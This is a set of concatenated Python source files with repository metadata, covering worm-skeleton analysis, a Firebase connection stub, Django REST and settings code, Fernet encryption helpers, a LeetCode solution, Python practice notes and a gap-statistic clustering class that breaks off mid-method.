if skeletons.size > 0:
frame_range = fid.get_node('/features_events/worm_1')._v_attrs['frame_range']
#pad the beginign with np.nan to have the same reference as segworm (time 0)
skeletons = np.pad(skeletons, [(frame_range[0],0), (0,0), (0,0)],
'constant', constant_values=np.nan)
#else:
# continue
with tables.File(skeletons_file, 'r') as fid:
timestamp_raw = fid.get_node('/timestamp/raw')[:].astype(np.int)
#read data from the old skeletons
fvars = loadmat(segworm_feat_file, struct_as_record=False, squeeze_me=True)
micronsPerPixels_x = fvars['info'].video.resolution.micronsPerPixels.x
micronsPerPixels_y = fvars['info'].video.resolution.micronsPerPixels.y
segworm_x = -fvars['worm'].posture.skeleton.x.T
segworm_y = -fvars['worm'].posture.skeleton.y.T
segworm = np.stack((segworm_x,segworm_y), axis=2)
#get the total number of skeletons
tot_skel = np.sum(~np.isnan(skeletons[:,0,0]))
tot_seg = np.sum(~np.isnan(segworm[:,0,0]))
#correct in case the data has different size shape
max_n_skel = min(segworm.shape[0], skeletons.shape[0])
skeletons = skeletons[:max_n_skel]
segworm = segworm[:max_n_skel]
#shift the skeletons coordinate system to one that diminushes the errors the most.
seg_shift = np.nanmedian(skeletons-segworm, axis = (0,1))
segworm += seg_shift
#print('S', seg_shift)
#%%
R_ori = np.sum(np.sqrt(np.sum((skeletons-segworm)**2, axis=2)), axis=1)
R_inv = np.sum(np.sqrt(np.sum((skeletons[:,::-1,:]-segworm)**2, axis=2)), axis=1)
bad_ind = np.isnan(R_ori)
ht_mismatch = np.argmin((R_ori, R_inv), axis =0)
ht_mismatch[bad_ind] = 0
#%%
bad_vec = np.zeros(skeletons.shape[0], np.bool)
if masked_image_file in bad_index_dict:
bad_indexes = bad_index_dict[masked_image_file]
for bad_index in bad_indexes:
bad_timestamp = timestamp_raw[bad_index[0]:bad_index[1]+1]
bad_vec[bad_timestamp] = True
#make false the once without skeletons to avoid double counting
bad_vec[np.isnan(skeletons[:,0,0])] = False
elif masked_image_file in good_index_dict:
good_indexes = good_index_dict[masked_image_file]
bad_vec = ~np.isnan(skeletons[:,0,0])
for good_index in good_indexes:
good_timestamp = timestamp_raw[good_index[0]:good_index[1]+1]
bad_vec[good_timestamp] = False
elif masked_image_file in wrong_files:
bad_vec = ~np.isnan(skeletons[:,0,0])
else:
tot_bad_skel = 0
tot_bad_skel = sum(bad_vec)
good_ind = ~bad_ind
tot_common = np.sum(good_ind)
#%%
new1old0 = np.sum(ht_mismatch & ~bad_vec & good_ind)
new0old1 = np.sum(ht_mismatch & bad_vec & good_ind)
new1old1 = np.sum(~ht_mismatch & ~bad_vec & good_ind)
new0old0 = np.sum(~ht_mismatch & bad_vec & good_ind)
#%%
all_dat.append((tot_skel, tot_seg, tot_bad_skel, tot_common, new1old0, new0old1, new1old1, new0old0))
#%%
if False:
w_xlim = w_ylim = (-10, skeletons.shape[0]+10)
plt.figure()
plt.subplot(2,1,1)
plt.plot(skeletons[:,1,1], 'b')
plt.plot(segworm[:,1,1], 'r')
plt.xlim(w_ylim)
plt.ylabel('Y coord')
plt.subplot(2,1,2)
plt.plot(skeletons[:,1,0], 'b')
plt.plot(segworm[:,1,0], 'r')
plt.xlim(w_xlim)
plt.ylabel('X coord')
plt.xlabel('Frame Number')
#%%
tot_skel, tot_seg, tot_bad_skel, tot_common, new1old0, new0old1, new1old1, new0old0 = zip(*all_dat)
only_seg = tuple(x-y for x,y in zip(tot_seg, tot_common))
only_skel = tuple(x-y for x,y in zip(tot_skel, tot_common))
#%%
#%%
tot_skels = sum(tot_skel)
tot_segs = sum(tot_seg)
tot_commons = sum(tot_common)
tot_union = tot_skels + tot_segs - tot_commons
frac_only_seg = (tot_skels - tot_commons) / tot_union
frac_only_skel = (tot_segs - tot_commons) / tot_union
frac_mutual = tot_commons / tot_union
#%%
frac_skel_bad = sum(tot_bad_skel)/tot_skels
#%%
skel_bad_common =1-(sum(new1old0) + sum(new1old1))/tot_commons
seg_bad_common = 1-(sum(new0old1) + sum(new1old1))/tot_commons
#%%
main_dir = '/Users/ajaver/Desktop/Videos/single_worm/switched_sample/'
all_files = [os.path.join(main_dir, x) for x in os.listdir(main_dir) if not '_features' in x and not '_skeletons' in x and not x.startswith('.')]
print([x for x in all_files if x not in files])
#%%
bad_old = [(x+y)/z for x,y,z in zip(new1old0, new0old0, tot_common)]
bad_new = [(x+y)/z for x,y,z in zip(new0old1, new0old0, tot_common)]
plt.figure()
plt.plot(bad_old, 'sr')
plt.plot(bad_new, 'og')
| [
"ajaver@MRC-8791.local"
] | ajaver@MRC-8791.local |
015e15bf458707fae3448d4b5d47aa6a5ef36ca0 | 62700ed2b150391d8c4044d122eed14f2939c96a | /conncFirebase.py | e0b7b1cd1b34a6d9659b98fc74f7bde32c04a1d1 | [
"MIT"
] | permissive | vaishvikmaisuria/Jarvis-Cloud-Vision-Platform | 07648f66529e60879c832c1c86907c3d2d177287 | 15bc7c36deb420efcc62ded0dfcadd4068512514 | refs/heads/master | 2020-12-15T04:01:38.794335 | 2020-02-12T15:39:44 | 2020-02-12T15:39:44 | 240,048,428 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 921 | py | import firebase_admin
from firebase_admin import credentials, firestore
import json
cred = credentials.Certificate('./supervisor-f2f29-firebase-adminsdk-l2twy-ae836f2735.json')
default_app = firebase_admin.initialize_app(cred)
db = firestore.client()
# when you want to add something create a similir set thing
doc_ref = db.collection(u'users').document(u'imageClassifier')
## Sets the data at this location to the given value.
#doc_ref.set({ u'name': "user", u'type': "Image name"})
## Returns the value, and optionally the ETag, at the current location of the database.
#for k in db.collection('users').stream():
# print(k.to_dict())
# print(k.id)
## Updates the specified child keys of this Reference to the provided values.
## doc_ref.update({ u'name': "user", u'type': "Cool Guy" })
## Creates a new child node.
# doc_ref.delete()
## Deletes this node from the database.
# doc_ref.push
print("Done")
| [
"vaishvik.maisuria@gmail.com"
] | vaishvik.maisuria@gmail.com |
cee8e55fea8287b1e38f4362812922d355299b4e | 601e07f347024c66fea1d8a86f5a795517123713 | /03-DRF-LEVEL-ONE/job_board/jobs/api/serializers.py | 13a0e2e4da771c1fa08c18ffb3814769017d2d3e | [] | no_license | frankeyey/django-rest-framework-learn | 817c8e3bc7763043745ed34f3258d60843be2faa | 8171eeb1742e5ad2bd9d57f8bbc7eb5538d0fd89 | refs/heads/main | 2023-03-03T22:18:32.380953 | 2021-02-14T07:36:41 | 2021-02-14T07:36:41 | 338,533,904 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 186 | py | from rest_framework import serializers
from jobs.models import JobOffer
class JobOfferSerializer(serializers.ModelSerializer):
class Meta:
model = JobOffer
fields = "__all__" | [
"frankeyc777@gmail.com"
] | frankeyc777@gmail.com |
dc002ed84d38f8b5d09c1f49690bf3381da5bf9f | 518a869a4c29326b45a9c0faf415644e3da7a5d5 | /actors/encrypt_utils.py | c71436f9c0595ff34943d33191c553b96b06e63c | [
"BSD-3-Clause"
] | permissive | TACC/abaco | ee41ce0a9ad7590cc9d94ab5afd3d68d5ccd7315 | 155e0e9102d9a49b334b49f85c45736198752626 | refs/heads/master | 2023-09-04T11:56:12.676863 | 2023-08-14T17:25:51 | 2023-08-14T17:25:51 | 39,394,579 | 30 | 13 | BSD-3-Clause | 2023-06-05T23:38:34 | 2015-07-20T16:15:42 | Python | UTF-8 | Python | false | false | 794 | py | from cryptography.fernet import Fernet
from config import Config
key = Config.get('web', 'encryption_key')
f = Fernet(key.encode())
# Encrypt the string 'value' passed in.
def encrypt(value):
# needs to be a byte string to encrypt, which is why we use .encode()
encrypted = f.encrypt(value.encode())
# abaco needs regular strings (not byte strings) so we .decode() back to
# a regular string
encrypted = encrypted.decode("utf-8")
return encrypted
# Decrypt the encrypted 'value' passed in.
def decrypt(value):
# needs to be a byte string to decrypt, which is why we use .encode()
decrypted = f.decrypt(value.encode())
# abaco needs regular strings (not byte strings) so we .decode() back
decrypted = decrypted.decode("utf-8")
return decrypted | [
"nraufiero@gmail.com"
] | nraufiero@gmail.com |
aa0b7feda3f4111dee7da99f5897b04ae45099c3 | 7cc312f65eb2d6af491e8b13ef57ff3ba2babf7f | /leetcode/python3/convert-sorted-array-to-binary-search-tree.py | 766b52f6a24b8899262f7849ba9c673fe7907deb | [] | no_license | tangwz/leetcode | df1c978999f4ed76254eb82be08785957052dca9 | 38e860a2fd103958d12a64a87e32f8c9c20d0a59 | refs/heads/master | 2021-01-22T13:13:04.181337 | 2019-11-26T08:00:39 | 2019-11-26T08:00:39 | 30,180,759 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 684 | py | #
# @lc app=leetcode id=108 lang=python
#
# [108] Convert Sorted Array to Binary Search Tree
#
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def sortedArrayToBST(self, nums):
"""
:type nums: List[int]
:rtype: TreeNode
"""
if not nums:
return None
mid = len(nums) // 2
node = TreeNode(nums[mid])
node.left = self.sortedArrayToBST(nums[:mid])
node.right = self.sortedArrayToBST(nums[mid+1:])
return node
| [
"tangwz.com@gmail.com"
] | tangwz.com@gmail.com |
df431e432664d389698f5825dd25db4686507c26 | 2f9e7a6a58bb5937e4563730f933760838cee99a | /config/settings/local.py | 4aac7b797fb339605d5f91b7dfa62c3c512822f6 | [] | no_license | jsmera/warm-cliffs-42549 | 35b564a0c17dd2b37e98bbaa56f2f2f24462453a | 22440965f37bb3ae1bd0260e0c6e0ef510496ec6 | refs/heads/main | 2023-01-22T13:01:34.547348 | 2020-11-30T03:49:00 | 2020-11-30T03:49:00 | 315,156,131 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 191 | py | from .common import *
INSTALLED_APPS += [
"debug_toolbar",
]
MIDDLEWARE += [
"debug_toolbar.middleware.DebugToolbarMiddleware",
]
INTERNAL_IPS = [
"127.0.0.1",
]
DEBUG = True
| [
"merac1999@gmail.com"
] | merac1999@gmail.com |
2500d720d0d205e1657e9e81af3e2a45a51b16bc | 0dd959ae1da4de1bd009db0db52fb792e38fbbd5 | /102/colors.py | e59a41187c1d5090e78f57c192e4460afefeea53 | [] | no_license | janinewhite/bitesofpy | 849d2963bef8024fb900412fa06ab340e1b7fd73 | f57e2a15b4c2f685abfbf5647e5638578aafcc7e | refs/heads/master | 2020-07-24T07:20:30.755847 | 2020-02-14T15:50:55 | 2020-02-14T15:50:55 | 207,844,220 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 712 | py | VALID_COLORS = ['blue', 'yellow', 'red']
def print_colors():
"""In the while loop ask the user to enter a color,
lowercase it and store it in a variable. Next check:
- if 'quit' was entered for color, print 'bye' and break.
- if the color is not in VALID_COLORS, print 'Not a valid color' and continue.
- otherwise print the color in lower case."""
chose_quit = False
while not chose_quit:
color = str(input("Enter a color.")).lower()
chose_quit = (color=="quit")
if chose_quit:
print("bye")
break
elif color in VALID_COLORS:
print(color)
else:
print("Not a valid color")
pass | [
"janine.white@gmail.com"
] | janine.white@gmail.com |
533b09301546818931ce3a0cdc6ca772e90561a6 | d3042b039c86cddc6422d5b927a7c9f72ef2cee0 | /rnn_play.py | 14ed01d00d5f2b3ef0d9198cfa0e284ff4a42627 | [] | no_license | chiriacandrei25/Recurrent-Neural-Network | 15c5f96a849092768010967368ff25039969a36a | 6004f184305034865ad9d4b1a8fc5d6e98b991a5 | refs/heads/master | 2020-03-23T07:31:43.936631 | 2018-09-10T12:55:59 | 2018-09-10T12:55:59 | 141,277,125 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,369 | py | # encoding: UTF-8
# Copyright 2017 Google.com
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import tensorflow as tf
import numpy as np
import my_txtutils
import checker
# these must match what was saved !
ALPHASIZE = my_txtutils.ALPHASIZE
directory = "C:/Users/achiriac/Desktop/Workspace/RNN/validation_test/*.txt"
NLAYERS = 3
INTERNALSIZE = 512
eC0 = "C:/Users/achiriac/Desktop/Workspace/RNN/checkpoints/rnn_train_1535104117-12000000"
eC1 = "C:/Users/achiriac/Desktop/Workspace/RNN/checkpoints/rnn_train_1535360733-5800000"
author = eC0
author1 = eC1
def validate_test():
validate_on_network(author)
validate_on_network(author1)
def validate_on_network(auth):
with tf.Session() as sess:
new_saver = tf.train.import_meta_graph(auth + '.meta')
new_saver.restore(sess, auth)
valitext, _, __ = my_txtutils.read_data_files(directory, validation=False)
VALI_SEQLEN = 1 * 64 # Sequence length for validation. State will be wrong at the start of each sequence.
bsize = len(valitext) // VALI_SEQLEN
vali_x, vali_y, _ = next(
my_txtutils.rnn_minibatch_sequencer(valitext, bsize, VALI_SEQLEN, 1)) # all data in 1 batch
vali_nullstate = np.zeros([bsize, INTERNALSIZE * NLAYERS])
feed_dict = {'inputs/X:0': vali_x, 'target/Y_:0': vali_y, 'model/pkeep:0': 1.0,
'hidden_state/Hin:0': vali_nullstate, 'model/batchsize:0': bsize}
ls, acc = sess.run(["display_data/batchloss:0", "display_data/accuracy:0"], feed_dict=feed_dict)
my_txtutils.print_validation_stats(ls, acc)
def generate_text():
with tf.Session() as sess:
new_saver = tf.train.import_meta_graph(author + '.meta')
new_saver.restore(sess, author)
x = my_txtutils.convert_from_alphabet(ord("E"))
x = np.array([[x]]) # shape [BATCHSIZE, SEQLEN] with BATCHSIZE=1 and SEQLEN=1
# initial values
y = x
h = np.zeros([1, INTERNALSIZE * NLAYERS], dtype=np.float32) # [ BATCHSIZE, INTERNALSIZE * NLAYERS]
for i in range(1000000000):
yo, h = sess.run(['softmax_layer/Yo:0', 'GRU/H:0'],
feed_dict={'inputs/X:0': y, 'model/pkeep:0': 1., 'hidden_state/Hin:0': h,
'model/batchsize:0': 1})
# If sampling is be done from the topn most likely characters, the generated text
# is more credible. If topn is not set, it defaults to the full distribution (ALPHASIZE)
# Recommended: topn = 10 for intermediate checkpoints, topn=2 or 3 for fully trained checkpoints
c = my_txtutils.sample_from_probabilities(yo, topn=2)
y = np.array([[c]]) # shape [BATCHSIZE, SEQLEN] with BATCHSIZE=1 and SEQLEN=1
c = chr(my_txtutils.convert_to_alphabet(c))
print(c, end="")
validate_test() | [
"noreply@github.com"
] | chiriacandrei25.noreply@github.com |
248fc87af3d3638daf6aac3c7c91e9a55a60eca9 | 6baf796e259b56313723e19bd00fd2e5433d6443 | /Intermediate_Python.py | 1b63a620274f5139bd266f804af4f3db41727bcd | [] | no_license | toeysk130/Python_Lesson | 8756283ef396d1553505d4a1462374baa7de6982 | 0ba32ce1bdb89d568e222e589b735a0d93ebb3c4 | refs/heads/main | 2023-08-15T04:44:48.236389 | 2021-10-07T00:36:59 | 2021-10-07T00:36:59 | 413,620,200 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,255 | py | ### Question to find out
# Why Tuple is more faster than List?
##################################################### List: ordered,mutablem allows duplicate elements
myList = ["banana", "cherry", "apple","apple"]
print(myList)
myList2 = [5, True, "apple" ,"banana"] # List allow different datatypes
print(myList2[-1]) # Select reverse of element in array
if "banana" in myList:
print("yes")
else:
print("no")
item = myList.pop() #Get last element from array (Stack)
myList.remove("apple") #Remove only one match
myList.reverse()
myList.clear()
testSort = [2,4,0,-2,3,6,-7]
print(sorted(testSort)) # Sorted elements in array
mylist = [1] * 10 # Create new list with 1 in 10 times Ex. [1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
mylist = [1,2,3,4,5,6,7,8,9]
a = mylist[1:5] # Select begin - end of the array elements Ex. [2, 3, 4, 5]
a = mylist[::2] # select begin to end with 2 steps
###### ************* Important
list_org = ["banana", "cherry", "apple"]
list_cpy = list_org #### Both are referd to the same bytes in the memory
list_cpy.append("lemon")
print(list_cpy)
print(list_org)
list_cpy = list_org.copy() # 3 Ways to copy only data from one array to another
list_cpy = list(list_org)
list_cpy = list_org[:]
list_cpy.append("orange")
print(list_cpy)
print(list_org)
mylist = [1,2,3,4,5,6,7,8,9]
b = [i*i for i in mylist] # Expression with for loop interating
print(mylist)
print(b)
print('"""""""""""""""""""""""""""""')
##################################################### Tuple: ordered, immutabele, allows duplicate elements
mytuple = "Max", 28, "Boston"
mytuple = tuple(["Max", 28, "Boston"])
print(type(mytuple))
print(mytuple)
item = mytuple[-1]
print(item)
# mytuple[0] = "test" ## Can't run because tuple is immutable
for x in mytuple:
print(x)
if "Boston" in mytuple:
print("Yes")
else:
print("No")
my_tuple = ('a','p','p','l','e')
print(len(my_tuple))
print(my_tuple.count('p'))
print("index:" + str(my_tuple.index('l')))
my_list = list(my_tuple)
print(my_list)
my_tuple2 = tuple(mylist)
print(my_tuple2)
a = (1,2,3,4,5,6,7,8,9)
b = a[2:5]
print(b)
my_tuple = "Max", 28, "Boston"
name , age, city = my_tuple
print(f"{name} {age} {city}")
my_tuple = (0, 1, 2, 3, 4)
i1, *i2, i3 = my_tuple
print(i1) # First item
print(i3) # Last item
print(i2) # all of elements left between
import sys
my_list = [0, 1, 2, "hello", True]
my_tuple = (0, 1, 2, "hello", True) ## Tuple is more faster than List
print(sys.getsizeof(my_list), "bytes")
print(sys.getsizeof(my_tuple), "bytes")
import timeit
print(timeit.timeit(stmt="[0,1,2,3,4,5]", number=1000000)) #0.062963041s
print(timeit.timeit(stmt="(0,1,2,3,4,5)", number=1000000)) #0.007387499999999991
##################################################### Dictionarnies
mdict = {'name': 'Max', "age": 28, "City": "New York"}
print(mdict)
mdict2 = dict(name="Mary", age=27, city="New York")
print(mdict2)
print(type(mdict2))
value = mdict["name"]
print(value)
mdict["email"] = "max@xyz.com"
print(mdict)
print(id(mdict["email"]))
mdict["email"] = "coolmax@xyz.com"
print(mdict)
print(id(mdict["email"]))
del mdict["name"]
print(mdict)
mdict.pop("age")
print(mdict)
mdict.popitem()
print(mdict)
if "City" in mdict:
print(mdict["City"])
print("Hey")
try:
print(mdict["name"])
except:
print("Error")
mdict = {'name': 'Max', "age": 28, "City": "New York"}
for key in mdict.keys():
print(key)
for key in mdict.values():
print(key)
for key, value in mdict.items():
print(key, value)
mdict_cpy = mdict # Assign as a pointer in the same address in memory
print(mdict_cpy is mdict)
# Merge Dictionaries
mdict = {"name":"Max", "age": 28, "email": "max@xyz.com"}
mdict2 = dict(name="Mary", age=27, city="Boston")
mdict.update(mdict2)
print(mdict)
mdict = {3:9 , 6:36, 9:81}
print(mdict)
value = mdict[3]
print(value)
mytuple = (8, 7)
mdict = {mytuple: 15}
print(mdict)
##################################################### SETs
myset = {1, 2, 3}
print(myset)
print(type(myset))
myset = set("Hello")
print(type(myset))
myset.add(1)
myset.add(2)
myset.add(3)
print(myset)
myset.discard("H")
print(myset)
print(myset.pop())
print(myset)
for x in myset:
print(x)
if 2 in myset:
print("YES")
# -----------------------------
odds = {1, 3, 5, 7, 9}
evens = {0, 2, 4, 6, 8}
primes = {2, 3, 5, 7}
u = odds.union(evens)
print(u)
print(id(u))
u = odds.intersection(primes)
print(u)
print(id(u))
setA = {1,2,3,4,5,6,7,8,9}
setB = {1,2,3,10,11,12}
diff = setA.difference(setB)
print(diff)
diff = setB.difference(setA)
print(diff)
diff = setB.symmetric_difference(setA) # Not in intersect of A & B
print(diff)
setA.update(setB) # Add new elements from setB without duplication
print(setA)
setA = {1,2,3,4,5,6,7,8,9}
setB = {1,2,3,10,11,12}
setA.intersection_update(setB)
print(setA)
setA = {1,2,3}
setB = {1,2,3,10,11,12}
print(setA.issubset(setB)) # is all elements on setA are in setB ?
print(setB.issubset(setA))
setC = {7,8}
print(setB.issuperset(setA))
print(setA.isdisjoint(setC))
setA = {1,2,3,4,5,6}
setB = setA.copy()
setB = set(setA)
print(id(setA))
print(id(setB))
print(setA)
print(setB)
# -----------------------------
a = frozenset([1,2,3,4])
# a.add(2)
print(type(a))
print(a)
| [
"puttipong.pua@gmail.com"
] | puttipong.pua@gmail.com |
c2a6c7801f3547946b38492ef118dd975aae1772 | e6c17803c9f60dbeafa7e866d7e108a3239d799d | /what_the_cluster/GapStat.py | 1f928a08083bccde57f61c9a8b280bc201d89c3b | [] | no_license | idc9/what_the_cluster | e6cf04730e224625a0bce21f7a9730a4984d54bd | 50f024e214cf6f4f4f976ac104d50a0c9a7a6d94 | refs/heads/master | 2020-03-11T17:46:27.297370 | 2018-09-19T21:53:59 | 2018-09-19T21:53:59 | 130,156,780 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,107 | py | from math import sqrt
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from sklearn.externals import joblib
from scipy.sparse import issparse
from what_the_cluster.gapstat_utils import get_pooled_wcss, estimate_n_clusters
from what_the_cluster.reference_dists import sample_svd_null, sample_uniform_null
from what_the_cluster.utils import _is_strictly_increasing, _count_none, svd_wrapper
from what_the_cluster.clusterers import get_clusterer
# TODO: implement seeds
# TODO: give clusterer the option to return additional data
# TODO: give user the ability to input pre-sampled reference distributions
class GapStat(object):
def __init__(self,
clusterer='kmeans',
clusterer_kwargs={},
cluster_sizes=list(range(1, 11)),
ref_dist='uniform',
B=10,
gap_est_method='Tibs2001SEmax'):
"""
For details see Estimating the Number of Clusters in a Data Set via
the Gap Statistic by R. Tibshirani, G. Walther and T. Hastie, 2001.
Parameters
----------
clusterer (str, function): a function which computes clusters.
If clusterer is a string, the will used one of the pre-implemented
clustering algorithms from clusterers.py. Available options include
['kmeans']
If clusterer is a function then it should accpet two argumets:
(X, n_clusters) where X is the data set to cluster and n_clusters
is the number of desired clusters to estimate. This function should
return a list of estimated clusters for each observation.
clusterer_kwargs (None, dict): dict of key word arguments for the
clusterer function. See the documentation for the orignal functions
for available arguments (linked to in clusterers.py)
Warning: these are only applied for the
pre-implemented clusterers i.e. if clusterer is a string.
cluster_sizes (list): list of n_clusters to evaluate. Must be
strictly increasing.
ref_dist (str): which null reference distribution to use. Either
['uniform', 'svd']. 'uniform' will draw uniform smaples
from a box which has the same range of the data. 'PCA' will
use the prinicpal components to better adapt the shape of
the reference distribution to the observed data set.
See (Tibshirani et al, 2001) for details.
B (int): number of samples of null reference set to draw to estimated
the E log(W)
gap_est_method (str): how to select the local max using the gap
statistic. Currently one of ['firstmax', 'globalmax',
'Tibs2001SEmax']. See estimate_n_clusters() for details.
"""
assert ref_dist in ['uniform', 'svd']
assert _is_strictly_increasing(cluster_sizes)
self.ref_dist = ref_dist
self.B = B
self.cluster_sizes = cluster_sizes
self.gap_est_method = gap_est_method
if callable(clusterer):
# there might be an issue with python 3.x for x <2
# see https://stackoverflow.com/questions/624926/how-do-i-detect-whether-a-python-variable-is-a-function
self.clusterer_name = 'custom'
self.clusterer = clusterer
if clusterer_kwargs is not None:
# TODO: make this a proper Warning
print("WARNING: clusterer_kwargs is only use for pre-implemented clusterers")
else:
self.clusterer_name = clusterer
if clusterer == 'custom':
# this means we are loading a saved version of this object
# and we didn't save the clusterer funciton which should be
# saved separately
self.clusterer = None
else:
self.clusterer = get_clusterer(clusterer, clusterer_kwargs)
# only store this in case we save this object to disk
self.clusterer_kwargs = clusterer_kwargs
# these attributes will be set later
# self.X = None # observed data
# self.U = None # U, D, V are SVD of X
# self.D = None
# self.V = None
# self.obs_cluster_labels = None
# self.obs_wcss = None
# self.null_wcss_samples = None
# self.est_n_clusters = None
# self.possible_n_clusters = None
# self.metadata = {}
def get_params(self):
return {'clusterer': self.clusterer,
'clusterer_kwargs': self.clusterer_kwargs,
'cluster_sizes': self.cluster_sizes,
'ref_dist': self.ref_dist,
'B': self.B,
'gap_est_method': self.gap_est_method}
def fit(self, X, cluster_labels=None,
U=None, D=None, V=None):
"""
Estimates the number of clusters using the gap statistic.
Parameters
----------
X (matrix): the observed data with observations on the rows.
cluster_labels (None or matrix, observations x len(cluster_sizes)): matrix
containing the observed cluster labels on the columns for each
value of n_clusters.
If None then will uses clusterer to estimate the number of clusters
using the provided clusterer
U, D, V: the precomputed SVD of X see set_svd_decomposition() for
details. These are only used if ref_dist = 'svd'. If they are not
provided then will compute them.
"""
if type(X) == pd.DataFrame:
self.var_names = np.array(X.columns)
else:
self.var_names = np.array(range(X.shape[1]))
if not issparse(X):
X = np.array(X)
if cluster_labels is None:
cluster_labels = self.compute_obs_clusters(X)
assert cluster_labels.shape == (X.shape[0], len(self.cluster_sizes))
if self.ref_dist == 'svd':
if _count_none(U, D, V) == 3:
U, D, V = svd_wrapper(X)
elif _count_none(U, D, V) != 0:
raise ValueError('U, D, V must all be provided or be set to None')
self.obs_wcss = self.compute_obs_wcss(X, cluster_labels)
self.null_wcss_samples = self.sample_ref_null_wcss(X, U=U, D=D, V=V)
self.compute_n_cluster_estimate(method=self.gap_est_method)
return self
@property
def est_cluster_memberships(self):
"""
Returns the estimated cluster memberships
"""
assert self.est_n_clusters is not None
est_cluster_size_ind = np.where(
np.array(self.cluster_sizes) == self.est_n_clusters)[0][0]
return self.obs_cluster_labels[:, est_cluster_size_ind]
def compute_obs_clusters(self, X):
obs_cluster_labels = np.zeros((X.shape[0], len(self.cluster_sizes)))
for i, n_clusters in enumerate(self.cluster_sizes):
obs_cluster_labels[:, i] = self.clusterer(X, n_clusters)
return obs_cluster_labels
def compute_obs_wcss(self, X, obs_cluster_labels):
"""
Computes the within class sum of squres for the observed clusters.
"""
n_cluster_sizes = len(self.cluster_sizes)
obs_wcss = np.zeros(n_cluster_sizes)
for j in range(n_cluster_sizes):
# make sure the number of unique cluster labels is equal to
# the preported number of clusters
# TODO: we might not want this restrictin
assert len(set(obs_cluster_labels[:, j])) \
== self.cluster_sizes[j]
obs_wcss[j] = get_pooled_wcss(X, obs_cluster_labels[:, j])
return obs_wcss
def sample_null_reference(self, X, U=None, D=None, V=None):
if self.ref_dist == 'uniform':
return sample_uniform_null(X)
elif self.ref_dist == 'svd':
return sample_svd_null(X, U, D, V)
def sample_ref_null_wcss(self, X, U=None, D=None, V=None):
null_wcss_samples = np.zeros((len(self.cluster_sizes), self.B))
for b in range(self.B):
# sample null reference distribution
X_null = self.sample_null_reference(X, U=U, D=D, V=V)
# cluster X_null for the specified n_clusters
for i, n_clusters in enumerate(self.cluster_sizes):
# cluster. null sample
null_cluster_labels = self.clusterer(X_null, n_clusters)
null_wcss_samples[i, b] = get_pooled_wcss(X_null,
null_cluster_labels)
return null_wcss_samples
@property
def E_log_null_wcss_est(self):
"""
Estimate of the expected log(WCSS) of the null reference distribution
"""
assert self.null_wcss_samples is not None
return np.log(self.null_wcss_samples).mean(axis=1)
@property
def E_log_null_wcss_est_sd(self):
"""
Standard deviation of the estimated expected log(WCSS) from the null
distribuiton
"""
assert self.null_wcss_samples is not None
return np.std(np.log(self.null_wcss_samples), axis=1)
@property
def log_obs_wcss(self):
"""
log(WCSS) of the observed cluseters
"""
assert self.obs_wcss is not None
return np.log(self.obs_wcss)
@property
def gap(self):
"""
Returns the gap statistic i.e. E*(log(WCSS_null)) - log(WCSS_obs)
where E* means the estimated expected value
"""
assert self.obs_wcss is not None
return self.E_log_null_wcss_est - self.log_obs_wcss
@property
def adj_factor(self):
return sqrt(1.0 + (1.0/self.B))
def compute_n_cluster_estimate(self, method=None):
"""
Parameters
----------
method (str): which method to use to estimate the number of clusters.
Currently one of ['firstmax', 'globalmax', 'Tibs2001SEmax']
firstmax: finds the fist local max of f
globalmax: finds the global max of f
Tibs2001SEmax: uses the method detailed in (Tibshirani et al, 2001)
i.e. the first k (smallest number of clusters) such that
f[k] >= f[k + 1] - se[k + 1] * se_adj_factor
return_possibilities (bool): whether or not to also return the
other possible estimates
Output
------
est_n_clusters, possibilities
est_n_clusters: the estimated number of clustesr
possibilities: local maxima of the given method
"""
if method is None:
method = self.gap_est_method
est_n_clusters, possibilities = \
estimate_n_clusters(cluster_sizes=self.cluster_sizes,
f=self.gap,
se=self.E_log_null_wcss_est_sd,
se_adj_factor=self.adj_factor,
method=method)
self.gap_est_method = method
self.est_n_clusters = est_n_clusters
self.possible_n_clusters = possibilities
def plot_wcss_curves(self):
# plot observed log(WCSS)
plt.plot(self.cluster_sizes,
self.log_obs_wcss,
marker="$O$",
color='blue',
ls='solid',
label='obs')
# plot the expected log(WCSS) of the null references
plt.plot(self.cluster_sizes,
self.E_log_null_wcss_est,
marker='$E$',
color='red',
ls='dashed',
label='E null')
plt.xticks(self.cluster_sizes)
plt.xlabel('number of clusters')
plt.ylabel('log(WCSS)')
plt.legend()
def plot_gap(self, errorbars=True, include_est=True,
include_possibilities=False):
if errorbars:
# TODO: should we use s_adj for error bars?
plt.errorbar(self.cluster_sizes,
self.gap,
color='black',
yerr=self.E_log_null_wcss_est_sd)
else:
plt.plot(self.cluster_sizes,
self.gap,
color='black',
marker='x')
plt.xticks(self.cluster_sizes)
plt.xlabel('number of clusters')
plt.ylabel('gap')
# maybe include the estimated numer of clusters
if include_est:
plt.axvline(x=self.est_n_clusters, color='red',
label='estimated {} clusters'.
format(self.est_n_clusters))
# maybe include other possible estimates
if include_possibilities:
label = 'possibility'
for n in self.possible_n_clusters:
if n == self.est_n_clusters:
continue
plt.axvline(x=n, color='blue', ls='dashed', lw=1, label=label)
label = '' # HACK: get only one 'possibility' label to show up
plt.legend()
def save(self, fname, compress=True, include_data=False):
# save_dict = {'ref_dist': self.ref_dist,
# 'B': self.B,
# 'cluster_sizes': self.cluster_sizes,
# 'gap_est_method': self.gap_est_method,
# 'clusterer_name': self.clusterer_name,
# 'clusterer_kwargs': self.clusterer_kwargs,
# 'obs_cluster_labels': self.obs_cluster_labels,
# 'obs_wcss': self.obs_wcss,
